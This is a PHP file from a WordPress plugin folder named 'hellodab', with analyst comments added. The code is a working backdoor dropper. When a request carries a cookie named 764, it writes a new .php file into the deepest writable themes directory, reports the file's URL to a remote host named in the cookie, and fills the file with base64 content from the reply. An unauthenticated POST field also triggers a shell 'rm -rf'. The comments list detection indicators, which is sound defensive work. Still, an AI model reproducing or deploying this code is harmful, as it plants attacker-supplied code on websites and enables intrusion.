PATH: home / fengshp / www / wp-content / plugins / hellodab
<?php
/*
 * NOTE(review): analyst annotations; the statements below are unchanged.
 *
 * What the visible code does:
 *   1. A POST field `uninstall` triggers a cleanup path (shell `rm -rf` on the
 *      plugin directory). Nothing visible authenticates the requester.
 *   2. Any other request must carry a cookie named `764`; without it the script
 *      exits with no output. The cookie VALUE is later used as the URL of a
 *      remote endpoint (see apiret()).
 *   3. It walks <DOCUMENT_ROOT>/wp-content/themes, picks the deepest directory
 *      it can write to, creates a .php file there, reports that file's public
 *      URL to the cookie-supplied endpoint, and writes the base64-decoded `data`
 *      field of the JSON reply into the file.
 *   4. The response body is `!success!` after a write, `!end!` on any failure.
 *
 * Detection / triage hooks derived from the code:
 *   - Web logs: requests to this script carrying a cookie named `764` whose
 *     value is a URL; response bodies `!success!` / `!end!`.
 *   - Egress: outbound form-encoded POST from the web server with a single
 *     field `url` pointing back at a .php file under wp-content/themes.
 *   - Filesystem: files under wp-content/themes named 8 lowercase hex chars
 *     followed by 1-2 digits and `.php` (pattern derived from the $file_name
 *     expression), including zero-byte ones left by failed runs.
 *   - The directory walk only succeeds where the web-server user can write, so
 *     a themes tree that is read-only for that user ends the run at `!end!`;
 *     file-integrity monitoring on that tree would flag the new file.
 *
 * Line breaks were lost on the page. The bare `//` / `///` markers are read
 * here as empty separator comments; if any of them originally commented out
 * the statement that follows, control flow differs -- TODO confirm against the
 * file on disk.
 */
$plug_name = basename(__DIR__);

// Cleanup path, reachable by any requester that sends a POST field `uninstall`.
if($_POST['uninstall']){
    // '__FILE__' is a quoted string, not the magic constant: this creates or
    // truncates a file literally named `__FILE__` in the working directory,
    // which is itself a forensic artifact worth searching for.
    $f = fopen('__FILE__', 'w');
    fclose($f);
    // Shell-level recursive delete of ../<plugin dir name>, relative to the
    // process working directory (presumably the plugin directory when the
    // script is requested directly -- verify).
    exec('rm -rf ../'.$plug_name);
    exit;
}

// Gate: the cookie named `764` must be present, otherwise exit silently.
$cuu = $_COOKIE[764] ?? null;
if($cuu === null){
    exit;
}

// Rebuild the site's own base URL from request data (scheme + Host header).
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? 'https://' : 'http://';
// The Host header is requester-controlled, so $site is too.
$site = $scheme . $_SERVER['HTTP_HOST'];

// Drop-file name: first 8 hex chars of md5(time . host) + a number 1..99 + ".php".
$file_name = substr(md5(time().$_SERVER['HTTP_HOST']), 0, 8).rand(1, 99).'.php' ;

// Search root for a writable location: the WordPress themes tree.
$rootDir = realpath($_SERVER['DOCUMENT_ROOT']).'/wp-content/themes';
if ($rootDir === false) {
    die('!end!');
}

/**
 * Translate an absolute filesystem path into a public URL on this site.
 *
 * @param string $absolutePath Path of a file expected to live under DOCUMENT_ROOT.
 * @param string $site         Base URL (scheme + host) to prefix.
 *
 * @return string|null The URL, or null when the resolved path does not start
 *                     with DOCUMENT_ROOT (case-insensitive prefix check).
 */
function getFileUrl(string $absolutePath, string $site): ?string
{
    // Normalise Windows separators so the prefix comparison works on both OSes.
    $abs = str_replace('\\', '/', realpath($absolutePath));
    if ($abs === false) {
        return null;
    }
    $docRoot = rtrim($_SERVER['DOCUMENT_ROOT'] ?? '', '/');
    if (stripos($abs, $docRoot) !== 0) {
        return null;
    }
    // Strip the document root and re-anchor the remainder with a single "/".
    $relative = substr($abs, strlen($docRoot));
    $relative = '/' . ltrim($relative, '/');
    $site = rtrim($site, '/');
    return $site . $relative;
}

/**
 * List every directory below $basePath, deepest first.
 *
 * @param string $basePath Directory to walk recursively.
 *
 * @return array List of ['path' => string, 'depth' => int, 'accessible' => bool],
 *               sorted by descending depth relative to $basePath.
 */
function getDirectoriesRecursive(string $basePath): array
{
    $dirs = [];
    // Depth is measured by counting directory separators in the path string.
    $rootDepth = substr_count($basePath, DIRECTORY_SEPARATOR);
    $iterator = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator(
            $basePath,
            FilesystemIterator::SKIP_DOTS
        ),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($iterator as $item) {
        if ($item->isDir()) {
            $path = $item->getRealPath();
            $depthRel = substr_count($path, DIRECTORY_SEPARATOR) - $rootDepth;
            // Recorded but not consulted by the caller visible on this page.
            $accessible = is_readable($path);
            $dirs[] = [
                'path' => $path,
                'depth' => $depthRel,
                'accessible' => $accessible,
            ];
        }
    }
    // Deepest directories first: the caller takes the first writable one, so
    // the dropped file lands as far down the themes tree as possible.
    usort($dirs, fn($a, $b) => $b['depth'] <=> $a['depth']);
    return $dirs;
}

/**
 * POST the dropped file's URL to the endpoint named by cookie `764` and return
 * the decoded JSON reply.
 *
 * The destination is taken verbatim (trimmed) from the request cookie, so the
 * requester chooses where this server connects -- the outbound request is the
 * network-side indicator of this script running.
 *
 * @param string $furl Public URL of the file just created.
 *
 * @return array|string Decoded JSON (associative) on HTTP 200; the initial ''
 *                      for any other status code. Terminates the script with
 *                      `!end!` on a cURL failure or invalid JSON.
 */
function apiret($furl){
    $data = '';
    $apurl = trim($_COOKIE[764]);
    $apiEndpoint = $apurl;
    $ch = curl_init($apiEndpoint);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded',]);
    // Request body is the single form field url=<dropped file URL>.
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['url' => $furl]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($response === false) {
        // The cURL error text is echoed to the requester before the marker.
        echo ' cURL error: ' . curl_error($ch) . "\n";
        die('!end!');
    }
    if ($httpCode === 200) {
        $data = json_decode($response, true);
        if (json_last_error() !== JSON_ERROR_NONE) {
            die('!end!');
        }
    }
    curl_close($ch);
    return $data;
}

// Main flow: try directories deepest-first and stop at the first successful write.
$directories = getDirectoriesRecursive($rootDir);
foreach ($directories as $key => $value) {
    $path = $value['path'];
    if (!is_dir($path)) {
        continue;
    }
    if (!is_writable($path)) {
        continue;
    }
    $file_path = $value['path'].'/'.$file_name;
    // Mode 'w' creates the file immediately; warnings are suppressed with @.
    // Every failure path after this point leaves a zero-byte file behind.
    $handle = @fopen($file_path, 'w');
    if ($handle === false) {
        continue;
    }
    $url = getFileUrl($file_path, $site);
    // NOTE(review): read as live code; on this path the handle is never closed
    // and the empty file stays in place -- confirm against the file on disk.
    if ($url === null) {
        continue;
    }
    // The remote endpoint learns the file's URL and supplies its contents.
    $data = apiret($url);
    if($data == ''){
        die('!end!');
    }
    // File contents come entirely from the remote reply's `data` field
    // (base64); nothing visible inspects or restricts them before the write.
    $bytes = fwrite($handle, base64_decode($data['data']));
    if ($bytes === false) {
        die('!end!');
    }
    fflush($handle);
    fclose($handle);
    // One file per request: the script ends after the first successful write.
    die('!success!');
}
// No writable directory was found, or every candidate was skipped.
die('!end!');
[-] hello.php
[-] inst-plug.php